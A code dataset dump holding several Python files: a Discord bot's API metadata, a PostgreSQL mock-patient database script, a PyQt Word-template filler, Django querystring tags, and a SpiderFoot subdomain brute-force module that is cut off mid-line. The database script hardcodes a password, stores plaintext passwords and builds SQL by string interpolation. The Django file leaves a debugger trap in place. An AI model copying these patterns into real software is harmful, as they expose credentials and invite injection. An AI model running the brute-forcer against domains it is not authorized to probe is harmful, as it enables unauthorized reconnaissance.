"usage_type": "call"}, {"api_name": "googletrans.LANGCODES.items", "line_number": 152, "usage_type": "call"}, {"api_name": "googletrans.LANGCODES", "line_number": 152, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 162, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 170, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 170, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 172, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 173, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 174, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 175, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 190, "usage_type": 
"call"}, {"api_name": "random.randint", "line_number": 191, "usage_type": "call"}, {"api_name": "discord.User", "line_number": 200, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 206, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 208, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 217, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 227, "usage_type": "call"}, {"api_name": "discord.User", "line_number": 238, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 302, "usage_type": "call"}, {"api_name": "Bugs.KILLED_SYNONYMS", "line_number": 302, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 305, "usage_type": "call"}, {"api_name": "Bugs.KILLED_SYNONYMS", "line_number": 305, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 316, "usage_type": "call"}, {"api_name": "Bugs.KILLED_SYNONYMS", "line_number": 316, "usage_type": "attribute"}, {"api_name": "discord.User", "line_number": 320, "usage_type": "attribute"}, {"api_name": "Movies.MovieHandler", "line_number": 341, "usage_type": "call"}, {"api_name": "Movies.MovieHandler", "line_number": 351, "usage_type": "call"}, {"api_name": "Movies.MovieHandler", "line_number": 362, "usage_type": "call"}, {"api_name": "Movies.MovieHandler", "line_number": 379, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 383, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 385, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 387, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 389, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 391, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 393, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 395, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 397, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 399, "usage_type": "call"}, {"api_name": "Music.getVideo", "line_number": 408, "usage_type": "call"}, {"api_name": "Music.getYTFile", "line_number": 497, "usage_type": "call"}, {"api_name": "discord.FFmpegPCMAudio", "line_number": 498, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 500, "usage_type": "call"}, {"api_name": "BeatRequests.BSSong", "line_number": 537, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 543, "usage_type": "call"}, {"api_name": "discord.Colour.red", "line_number": 546, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 546, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 579, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 594, "usage_type": "call"}, {"api_name": "time.time", "line_number": 594, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 599, "usage_type": "call"}]}
+{"seq_id": "13417053638", "text": "import psycopg2\r\n\r\n# PostgreSQL Database Information\r\n#DATABASE = \"test_db\"\r\n#USER = \"postgres\"\r\n#PASSWORD = \"amilucy.2152ami\"\r\n#HOST = \"127.0.0.1\"\r\n#PORT = \"5432\"\r\n\r\nimport psycopg2\r\nimport os\r\nimport pandas as pd\r\n\r\nDATABASE = \"mdph612yz2\"\r\nUSER = \"postgres\"\r\nPASSWORD = \"amilucy.2152ami\"\r\nHOST = \"127.0.0.1\"\r\nPORT = \"5432\"\r\n\r\n\"\"\"\r\nThis script builds all required databases and populates them with mock data\r\n\"\"\"\r\n\r\n# connect to the PostgreSQL database\r\ncon = psycopg2.connect(database=DATABASE, user=USER, password=PASSWORD,\r\n                       host=HOST, port=PORT)\r\nprint(\"Database opened successfully\")\r\n\r\n\r\n################ CREATE DATABASES ################\r\n\r\n\r\n# Create patient database containing name and password\r\ndef create_patient_database(cur):\r\n    cur.execute(\"DROP TABLE IF EXISTS PATIENT CASCADE\")\r\n    # create a table called PATIENT\r\n    cur.execute('''CREATE TABLE PATIENT (\r\n        PATIENTID INT PRIMARY KEY NOT NULL,\r\n        NAME TEXT NOT NULL,\r\n        PASSWORD TEXT NOT NULL);''')\r\n    \r\n\r\n# Create image database containing image name and path\r\ndef create_image_database(cur):\r\n    cur.execute(\"DROP TABLE IF EXISTS IMAGE CASCADE\")\r\n    cur.execute('''CREATE TABLE IMAGE (\r\n        IMAGEID INT PRIMARY KEY NOT NULL,\r\n        NAME TEXT NOT NULL,\r\n        FULLPATH TEXT NOT NULL);''')\r\n\r\n# Create patient-image database linking images to patients\r\ndef create_patientimage_database(cur):\r\n    cur.execute(\"DROP TABLE IF EXISTS PATIENT_IMAGE CASCADE\")\r\n    cur.execute('''CREATE TABLE PATIENT_IMAGE (\r\n        PATIENTID INTEGER NOT NULL,\r\n        IMAGEID INTEGER NOT NULL,\r\n        PRIMARY KEY (PATIENTID , IMAGEID),\r\n        FOREIGN KEY (PATIENTID)\r\n            REFERENCES PATIENT (PATIENTID)\r\n            ON UPDATE CASCADE ON DELETE CASCADE,\r\n        FOREIGN KEY (IMAGEID)\r\n            REFERENCES IMAGE (IMAGEID)\r\n            ON UPDATE CASCADE ON DELETE CASCADE\r\n    )\r\n    ''')\r\n\r\n\r\n    \r\n################ INSERT DATABASES ################\r\n\r\ndef insert_to_database(cur):\r\n    # Patient information\r\n\r\n    \r\n    Patient_list = [\r\n        [1, 'Yujing Jackson', 'Shirin'],\r\n        [2, 'Marco DiFreddie', 'Piotr'],\r\n        [3, 'Hossein Queen', 'Jan'],\r\n        [4, 'Alexandru Mercury', 'Horacio']\r\n        \r\n    ] \r\n\r\n    # Image information\r\n    Image_list = [\r\n        [1, 'originalhisto','p1\\A21.png'],\r\n        [2, 'segmentation','p1\\A21-annotation.png'],\r\n        [3, 'histogram', 'p1\\histogram1.png'],\r\n        [4,'dicomslice','p1\\dicom_png_test_001.png'],\r\n        [5,'GTmask','p1\\mask_png_test_001.png'],\r\n        [6,'PREDmask','p1\\pred_mask_test_001.png'],\r\n        [7, 'originalhisto','p2\\A42.png'],\r\n        [8, 'segmentation','p2\\A42-annotation.png'],\r\n        [9, 'histogram', 'p2\\histogram1.png'],\r\n        [10,'dicomslice','p2\\dicom_png_test_002.png'],\r\n        [11,'GTmask','p2\\mask_png_test_002.png'],\r\n        [12,'PREDmask','p2\\pred_mask_test_002.png'],\r\n        [13, 'originalhisto','p3\\A51.png'],\r\n        [14, 'segmentation','p3\\A51-annotation.png'],\r\n        [15, 'histogram', 'p3\\histogram1.png'],\r\n        [16,'dicomslice','p3\\dicom_png_test_003.png'],\r\n        [17,'GTmask','p3\\mask_png_test_003.png'],\r\n        [18,'PREDmask','p3\\pred_mask_test_003.png'],\r\n        [19, 'originalhisto','p4\\A52.png'],\r\n        [20, 'segmentation','p4\\A52-annotation.png'],\r\n        [21, 'histogram', 'p4\\histogram1.png'],\r\n        [22,'dicomslice','p4\\dicom_png_test_004.png'],\r\n        [23,'GTmask','p4\\mask_png_test_004.png'],\r\n        [24,'PREDmask','p4\\pred_mask_test_004.png'],\r\n    ]\r\n    \r\n    # Patient-Image link: the first 3 images for each patient are histology-related, the latter 3 are dicom-related\r\n    
patient_image = [\r\n [1,1],\r\n [1,2],\r\n [1,3],\r\n [1,4],\r\n [1,5],\r\n [1,6],\r\n \r\n [2,7],\r\n [2,8],\r\n [2,9],\r\n [2,10],\r\n [2,11],\r\n [2,12],\r\n \r\n [3,13],\r\n [3,14],\r\n [3,15],\r\n [3,16],\r\n [3,17],\r\n [3,18],\r\n \r\n [4,19],\r\n [4,20],\r\n [4,21],\r\n [4,22],\r\n [4,23],\r\n [4,24],\r\n ]\r\n############ inserting data into created table ##########\r\n try:\r\n \r\n for row in Patient_list:\r\n cur.execute(\"INSERT INTO PATIENT (PATIENTID,NAME,PASSWORD) \\\r\n VALUES (%i, '%s', '%s')\"%(row[0],row[1],row[2]))\r\n except Exception as e:\r\n print (e)\r\n \r\n try:\r\n for row in Image_list:\r\n cur.execute(\"INSERT INTO IMAGE (IMAGEID,NAME,FULLPATH) \\\r\n VALUES (%i, '%s', '%s')\"%(row[0],row[1],row[2]))\r\n\r\n except Exception as e:\r\n print (e)\r\n \r\n try:\r\n for row in patient_image:\r\n cur.execute(\"INSERT INTO PATIENT_IMAGE (PATIENTID,IMAGEID) \\\r\n VALUES (%i, %i)\"%(row[0],row[1]))\r\n except Exception as e:\r\n print (e)\r\n\r\n\r\n \r\n ############### Querying data from database#######\r\n ################ DISPLAY DATABASES ################\r\ndef read_db(cur, table):\r\n cur.execute('SELECT * FROM %s'%table)\r\n rows = cur.fetchall()\r\n for row in rows:\r\n print (row)\r\n\r\ndef main():\r\n # Open Database\r\n con = psycopg2.connect(database=DATABASE, user=USER, password=PASSWORD, host=HOST, port=PORT)\r\n print(\"Database opened successfully\")\r\n cur = con.cursor()\r\n\r\n # Create Database Tables\r\n create_patient_database(cur)\r\n create_image_database(cur)\r\n create_patientimage_database(cur)\r\n # create_organ_database(cur)\r\n # create_patientorgan_database(cur)\r\n\r\n # Insert data to tables\r\n insert_to_database(cur)\r\n con.commit()\r\n print(\"data inserted to database successfully\")\r\n\r\n # Print Database Content\r\n #read_db(cur,'PATIENT')\r\n #read_db(cur, 'IMAGE')\r\n #read_db(cur, 'PATIENT_IMAGE')\r\n #read_db(cur, 'ORGAN')\r\n #read_db(cur, 'PATIENT_ORGAN')\r\n\r\nif __name__ == \"__main__\":\r\n main()", "repo_name": "yujing1997/mdph612-webapp-histo", "sub_path": "db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 6299, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "psycopg2.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 177, "usage_type": "call"}]}
+{"seq_id": "42214197487", "text": "import sys\r\nimport os\r\nfrom PyQt5 import QtWidgets # For GUI Window\r\nimport GUI #file with design description\r\nfrom docxtpl import DocxTemplate\r\nimport openpyxl\r\nfrom datetime import datetime # To know when catalog file was modified last time\r\n\r\n\r\n# Window with result\r\nclass DialogApp(QtWidgets.QDialog, GUI.Ui_Dialog):\r\n def __init__(self, result_message, res_fname, er_ocur):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.lblResultMessage.setText(result_message)\r\n self.res_fname = res_fname\r\n # If there was an error, button will have other purpose\r\n if er_ocur:\r\n self.btnOk.setText(\"OK\")\r\n self.btnOk.clicked.connect(self.hide)\r\n else:\r\n self.btnOk.clicked.connect(self.open_folder)\r\n\r\n # open folder with result if there weren't any errors\r\n def open_folder(self):\r\n os.startfile(self.res_fname)\r\n self.hide()\r\n\r\n\r\n# Start Window\r\nclass MainApp(QtWidgets.QMainWindow, GUI.Ui_MainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n # Checking if there catalog file with default name and file location\r\n if os.path.isfile(os.path.dirname(os.getcwd()) + \"\\Каталог.xlsx\"):\r\n self.cat_name = os.path.dirname(os.getcwd()) + \"\\Каталог.xlsx\"\r\n # Using back up catalog file\r\n else:\r\n self.cat_name = \"Каталог_default.xlsx\"\r\n # Initial setting\r\n self.res_changed = False\r\n self.lineEditCatalog.setText(os.path.abspath(self.cat_name)) # Initial setting\r\n self.btnCatalog.clicked.connect(self.browse_Catalog) # Do browse_Catolog if button is clicked\r\n # Checking if there template folder with default name and location\r\n if os.path.exists(os.path.dirname(os.getcwd()) + \"\\\\template\"):\r\n self.lineEditTemplate.setText(os.path.abspath(os.path.dirname(os.getcwd()) + \"\\\\template\"))\r\n # Using back up template folder\r\n else:\r\n self.lineEditTemplate.setText(os.path.abspath(\"template_default\"))\r\n self.btnTemplate.clicked.connect(self.browse_Template) # Do browse_Template if button is clicked\r\n # Finding out when selected catalog file was modified last time\r\n cat_mtime = datetime.fromtimestamp(os.stat(self.cat_name).st_mtime).strftime(\"%d.%m.%Y_%H.%M\")\r\n # Initial setting\r\n self.lineEditResult.setText(os.path.abspath(os.path.dirname(os.getcwd()) + \"\\\\result_\" + cat_mtime))\r\n self.btnResult.clicked.connect(self.browse_Result) # Do browse_Result if button is clicked\r\n self.btnStart.clicked.connect(self.process) # Do main body of utility\r\n\r\n # selecting new catalog file with usage of dialog window\r\n def browse_Catalog(self):\r\n ch_file = QtWidgets.QFileDialog.getOpenFileName(self, \"Выберите файл Каталог\", self.cat_name, \" *.xls *.xlsx\")\r\n if ch_file[0]: # checking that User selected something\r\n self.lineEditCatalog.setText(ch_file[0])\r\n # If User hasn't selected specific folder for result saving, modify future folder name\r\n if not self.res_changed:\r\n cat_mtime = datetime.fromtimestamp(os.stat(ch_file[0]).st_mtime).strftime(\"%d.%m.%Y_%H.%M\")\r\n self.lineEditResult.setText(os.path.abspath(os.path.dirname(os.getcwd()) + \"\\\\result_\" + cat_mtime))\r\n\r\n # selecting new folder with templates with usage of dialog window\r\n def browse_Template(self):\r\n ch_fold = QtWidgets.QFileDialog.getExistingDirectory(\r\n self, \"Выберите папку с шаблонами\",\r\n os.path.dirname(self.lineEditTemplate.text())\r\n )\r\n if ch_fold: # checking that User selected something\r\n self.lineEditTemplate.setText(ch_fold)\r\n\r\n # 
Select a new results folder using a dialog window\r\n def browse_Result(self):\r\n ch_fold = QtWidgets.QFileDialog.getExistingDirectory(\r\n self,\r\n \"Выберите папку, куда сохранить результаты работы\",\r\n os.path.dirname(self.lineEditResult.text())\r\n )\r\n if ch_fold: # check that the user selected something\r\n self.lineEditResult.setText(ch_fold)\r\n self.res_changed = True # Stop refreshing the results folder name when a new catalog file is selected\r\n\r\n # main body of the utility\r\n def process(self):\r\n # Reset\r\n self.res_changed = False\r\n # If the selected catalog file doesn't exist, prepare a message for the user\r\n if not os.path.isfile(self.lineEditCatalog.text()):\r\n result_message = \"Работа утилиты прервана, т.к. указанного файл-каталога не существует\"\r\n res_fname = \"\"\r\n er_ocur = True\r\n # If the selected template folder doesn't exist, prepare a message for the user\r\n elif not os.path.exists(self.lineEditTemplate.text()):\r\n result_message = \"Работа утилиты прервана, т.к. указанной папки с шаблонами не существует\"\r\n er_ocur = True\r\n res_fname = \"\"\r\n # If both the catalog file and the template folder exist\r\n else:\r\n # Reset\r\n er_ocur = False\r\n # open the catalog file\r\n cat_name = self.lineEditCatalog.text()\r\n wb = openpyxl.load_workbook(cat_name, data_only=True)\r\n # read the whole sheet into a list of rows\r\n content = list(map(list, wb.active.iter_rows(values_only=True)))\r\n # the first row of the catalog holds the labels used as tags in the Word documents\r\n label_tuple = tuple(map(str, content[0]))\r\n # create the results folder if necessary\r\n res_fname = self.lineEditResult.text()\r\n os.makedirs(res_fname, exist_ok=True)\r\n # set of names for which no template was found\r\n joker_set = set()\r\n # create new Word documents from the templates and the catalog rows\r\n for i in range(1, len(content)):\r\n # make sure the template name cell is not empty\r\n if content[i][1] is None or (set(str(content[i][1]))) == {\" \"}:\r\n content[i][1] = \"None\"\r\n # Choose the template: 
the template name is in the second column of the catalog\r\n tmpl_file = self.lineEditTemplate.text() + \"\\\\\" + str(content[i][1]) + \".docx\"\r\n # If the template file wasn't found, the joker template will be used\r\n if not os.path.isfile(tmpl_file):\r\n # remember the names for which no template was found\r\n joker_set.add(content[i][1])\r\n if os.path.isfile(self.lineEditTemplate.text() + \"\\\\joker.docx\"):\r\n tmpl_file = self.lineEditTemplate.text() + \"\\\\joker.docx\"\r\n # if no joker template exists in the selected template folder, use the joker\r\n # from the backup template folder\r\n else:\r\n tmpl_file = \"template_default\\\\joker.docx\"\r\n # open the proper or joker template\r\n doc = DocxTemplate(tmpl_file)\r\n # build the dictionary for tag replacement\r\n context = dict(zip(label_tuple, content[i]))\r\n # replace the tags\r\n doc.render(context, autoescape=True)\r\n # check whether the postfix (first column in the catalog) is empty and save the new document\r\n if content[i][0] is None or (set(str(content[i][0]))) == {\" \"}:\r\n doc.save(res_fname + \"\\\\\" + content[i][1] + ' ' + str(i) + '.docx')\r\n else:\r\n doc.save(res_fname + \"\\\\\" + content[i][1] + ' ' + str(content[i][0]) + '.docx')\r\n # Generate the message for the user\r\n # Show the name of the folder where results were saved\r\n result_message = \"Документы сгенерированы и сохранены в папку \" + res_fname\r\n # if the joker was used, show for which names\r\n if len(joker_set) > 0:\r\n result_message +=\\\r\n \"\\n\\nДля следующих наименований не были найдены шаблоны и применялась стандартная форма:\"\r\n for i in joker_set:\r\n result_message += \"\\n - \\\"\" + i + \"\\\"\"\r\n # show the result window\r\n window = DialogApp(result_message, res_fname, er_ocur)\r\n window.show()\r\n window.exec_()\r\n\r\ndef main():\r\n # show the start window\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MainApp()\r\n window.show()\r\n app.exec_()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "repo_name": "IvanovVasilii/filler-standard-documents", "sub_path": "Sisuphus.py", "file_name": "Sisuphus.py", "file_ext": "py", "file_size_in_byte": 8997, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 11, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 11, "usage_type": "name"}, {"api_name": "GUI.Ui_Dialog", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.startfile", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 31, "usage_type": "name"}, {"api_name": "GUI.Ui_MainWindow", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 46, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 46, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 47, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 55, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 55, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 61, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 66, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 67, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 71, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 71, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 71, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 80, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 80, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 80, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "openpyxl.load_workbook", "line_number": 109, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": 
"docxtpl.DocxTemplate", "line_number": 137, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 163, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 163, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 163, "usage_type": "attribute"}]}
+{"seq_id": "40975277809", "text": "from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef query_update(context, **kwargs):\n updated = context['request'].GET.copy()\n for k, v in kwargs.items():\n updated[k] = v\n return updated.urlencode()\n\n\n@register.simple_tag(takes_context=True)\ndef query_append(context, k=None, v=None, **kwargs):\n if k and v:\n kwargs[k] = v\n updated = context['request'].GET.copy()\n for k, v in kwargs.items():\n updated.appendlist(k, v)\n return updated.urlencode()\n\n\n@register.simple_tag\ndef test(test):\n import ipdb\n ipdb.set_trace()\n", "repo_name": "ad-m/django-atom", "sub_path": "atom/templatetags/querystring_tags.py", "file_name": "querystring_tags.py", "file_ext": "py", "file_size_in_byte": 619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.template.Library", "line_number": 3, "usage_type": "call"}, {"api_name": "django.template", "line_number": 3, "usage_type": "name"}, {"api_name": "ipdb.set_trace", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "12679617037", "text": "import re\nimport random\nimport threading\nimport dns.resolver\nfrom time import sleep\nfrom csv import DictReader\nfrom spiderfoot import SpiderFootEvent, SpiderFootPlugin\n\n\nclass sfp_dnsbrute(SpiderFootPlugin):\n\n meta = {\n 'name': \"DNS Brute-forcer\",\n 'summary': \"Attempts to identify hostnames through brute-forcing common names and iterations.\",\n 'flags': [\"\"],\n 'useCases': [\"Footprint\", \"Investigate\"],\n 'categories': [\"DNS\"]\n }\n\n # Default options\n opts = {\n \"domainonly\": True,\n \"numbermutation\": True,\n \"alphamutation\": True,\n \"_maxthreads\": 100\n }\n\n # Option descriptions\n optdescs = {\n \"domainonly\": \"Only attempt to brute-force names on domain names, not hostnames (some hostnames are also sub-domains).\",\n \"numbermutation\": \"For any host found, increment/decrement existing numbers (if any) and try appending 1, 01, 001, -1, -01, -001, 2, 02, etc. (up to 10)\",\n \"alphamutation\": \"For any host found, try common mutations such as -test, -old, etc.\",\n \"_maxthreads\": \"Maximum threads\"\n }\n\n _ipRegex = re.compile(r\"[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\")\n\n def setup(self, sfc, userOpts=dict()):\n self.sf = sfc\n self.sf.debug(\"Setting up sfp_dnsbrute\")\n self.state = self.tempStorage()\n self.state.update({\n \"sub_wordlist\": [],\n \"valid_hosts\": [],\n \"sent_events\": [],\n \"handled_events\": [],\n \"wildcards\": dict()\n })\n self.__dataSource__ = \"DNS\"\n self.lock = threading.Lock()\n self.iteration = 0\n\n for opt in list(userOpts.keys()):\n self.opts[opt] = userOpts[opt]\n\n self.word_regex = re.compile(r'[^\\d\\W_]+')\n self.word_num_regex = re.compile(r'[^\\W_]+')\n self.num_regex = re.compile(r'\\d+')\n\n dicts_dir = f\"{self.sf.myPath()}/spiderfoot/dicts/\"\n with open(f\"{dicts_dir}/subdomains.txt\", \"r\") as f:\n self.state[\"sub_wordlist\"] = list(set([x.strip().lower() for x in f.readlines()]))\n with open(f\"{dicts_dir}/subdomain_mutations_alpha.txt\", \"r\") as f:\n if self.opts[\"alphamutation\"]:\n self.state[\"alpha_mutation_wordlist\"] = list(set([x.strip().lower() for x in f.readlines()]))\n\n # set up nameservers\n self.resolvers = []\n nameservers = set()\n nameservers_url = \"https://public-dns.info/nameservers.csv\"\n nameservers_dict = self.sf.myPath() + \"/dicts/resolvers.txt\"\n # get every valid nameserver with 95% or higher reliability\n fetched_nameservers = str(self.sf.fetchUrl(\n nameservers_url,\n useragent=self.opts.get(\"_useragent\", \"Spiderfoot\")\n )[\"content\"])\n for line in DictReader(fetched_nameservers.splitlines()):\n ip_address = str(line.get(\"ip_address\", \"\")).strip()\n try:\n reliability = float(line.get(\"reliability\", 0))\n except ValueError:\n continue\n if reliability >= .95 and self._ipRegex.match(ip_address):\n nameservers.add(ip_address)\n # fall back to local dict if necessary\n if not nameservers:\n self.sf.debug(f\"Failed to retrieve nameservers from {nameservers_url}\")\n nameservers = set(self._ipRegex.findall(open(nameservers_dict, \"r\").read()))\n self.sf.debug(f\"Loaded {len(nameservers):,} nameservers from {nameservers_dict}\")\n else:\n self.sf.debug(f\"Loaded {len(nameservers):,} nameservers from {nameservers_url}\")\n self.verifyNameservers(nameservers)\n\n def resolve(self, host, tries=10, nameserver=None):\n if nameserver is None:\n resolver = self.getResolver()\n else:\n resolver = dns.resolver.Resolver()\n resolver.nameservers = [nameserver]\n\n self.sf.debug(f\"Resolving {host} using 
nameserver {resolver.nameservers[0]}\")\n\n ips = set()\n for recordType in [\"A\", \"AAAA\"]:\n try:\n for answer in resolver.resolve(host, recordType):\n ips.add(str(answer))\n break\n except dns.resolver.NXDOMAIN:\n break\n except Exception as e:\n self.sf.debug(f\"Error resolving \\\"{host}\\\": {e.__class__.__name__}: {e}\")\n if tries > 0:\n self.sf.debug(f\"Retrying \\\"{host}\\\"\")\n return self.resolve(host, tries=tries - 1, nameserver=nameserver)\n else:\n self.sf.debug(f\"Max retries ({tries:,}) exceeded for \\\"{host}\\\"\")\n return (host, [])\n\n return (host, list(ips))\n\n def isWildcard(self, target, ips):\n \"\"\"Checks if host+ips came from a wildcard DNS configuration\n Note: allows the first result through, so one entry is preserved\n\n Args:\n target (str): hostname\n ips (list): resolved IP addresses of hostname\n\n Returns:\n boolean: whether the host came from a wildcard DNS configuration\n \"\"\"\n wildcard = False\n host, domain = str(target).split(\".\", 1)\n\n # if we've already checked this domain:\n if domain in self.state[\"wildcards\"]:\n if all([ip in self.state[\"wildcards\"][domain] for ip in ips]):\n wildcard = True\n else:\n self.state[\"wildcards\"][domain] = self.getWildcardIPs(domain)\n\n return wildcard\n\n def getWildcardIPs(self, domain):\n randpool = \"bcdfghjklmnpqrstvwxyz3456789\"\n randhost = \"\".join([random.SystemRandom().choice(randpool) for x in range(10)]) + \".\" + domain\n return list(set([str(s) for s in self.resolve(randhost)[-1]]))\n\n def getResolver(self):\n with self.lock:\n self.iteration += 1\n return self.resolvers[self.iteration % len(self.resolvers)]\n\n def verifyNameservers(self, nameservers, timeout=2):\n \"\"\"Check each resolver to make sure it can actually resolve DNS names\n\n Args:\n nameservers (list): nameservers to verify\n timeout (int): timeout for dns query\n\n Returns:\n boolean: whether any of the nameservers are valid\n \"\"\"\n for nameserver in nameservers:\n threading.Thread(name=f\"sfp_dnsbrute_{nameserver}\", target=self.verifyNameserver, args=(nameserver, timeout)).start()\n sleep(timeout)\n if len(self.resolvers) > 0:\n self.sf.debug(f\"Using {len(self.resolvers):,} valid nameservers\")\n return True\n else:\n return False\n\n def verifyNameserver(self, nameserver, timeout=2):\n \"\"\"Validate a nameserver by making a sample query and a garbage query\n\n Args:\n nameserver (str): nameserver to verify\n timeout (int): timeout for dns query\n\n Returns:\n boolean: whether the nameserver is valid\n \"\"\"\n valid = True\n\n resolver = dns.resolver.Resolver()\n resolver.timeout = timeout\n resolver.lifetime = timeout\n resolver.nameservers = [nameserver]\n\n # first, make sure it can resolve google.com\n try:\n resolver.query(\"www.google.com\", \"A\")\n except Exception:\n valid = False\n\n # then, make sure it isn't feeding us garbage data\n randpool = \"bcdfghjklmnpqrstvwxyz3456789\"\n randhost = \"\".join([random.SystemRandom().choice(randpool) for x in range(10)]) + \".google.com\"\n try:\n results = list(resolver.query(randhost, \"A\"))\n if results:\n self.sf.debug(f\"Garbage data from 